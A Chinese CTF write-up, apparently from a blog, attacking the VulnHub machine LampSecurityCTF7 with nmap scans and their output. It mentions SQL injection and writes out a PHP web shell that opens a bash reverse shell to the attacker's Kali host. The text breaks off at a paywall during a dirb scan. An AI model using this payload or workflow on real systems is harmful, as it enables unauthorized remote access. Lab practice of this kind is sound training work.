靶机介绍
LampSecurityCTF7,vulnhub 靶机
主机发现
由于靶机配置问题,扫不到 ip
这里需要特别注意一下,在第一次启动打开靶机的时候,vmware会跳出一个提示框,让你选择我已复制该虚拟机/我已移动该虚拟机,一定要选择移动,用移动的方式网络环境会完整复现。否则有可能在主机发现的时候扫描不到这个靶机。如果后续发现真的出现了无法主机发现,莫慌,重装一下就行了。
(https://blog.youkuaiyun.com/Bossfrank/article/details/131324929)
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:32 CST
Nmap scan report for 192.168.50.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.156
Host is up (0.000081s latency).
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.90 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:42 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00044s latency).
Not shown: 65505 filtered tcp ports (no-response), 21 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:46 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
10000/tcp open http MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 1000 -p- 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:49 CST
Warning: 192.168.50.156 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00039s latency).
All 65535 scanned ports on bogon (192.168.50.156) are in ignored states.
Not shown: 64800 open|filtered udp ports (no-response), 735 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 719.01 seconds
漏洞脚本扫描(扫描很慢,不知道为啥)
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:32 CST
Stats: 0:26:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.80% done; ETC: 12:00 (0:00:53 remaining)
Stats: 0:35:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.34% done; ETC: 12:09 (0:00:59 remaining)
Stats: 0:43:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 12:16 (0:00:47 remaining)
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00030s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum:
|_ /login.php: Possible admin folder
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 3316.13 seconds
web 渗透
注入试试
8080 端口尝试注一下,没能成,似乎是数据库版本的注释有点问题,有报错信息,可以看一下
这样注入能成
有上传,考虑传个马
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ vim shell.php
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat shell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>
下一步找 shell.php 的位置,让他向 kali 弹 shell
扫目录,其中 asset 中看到上传文件
┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.156/
[sudo] password for kali:
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 27 13:54:34 2024
URL_BASE: http://192.168.
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
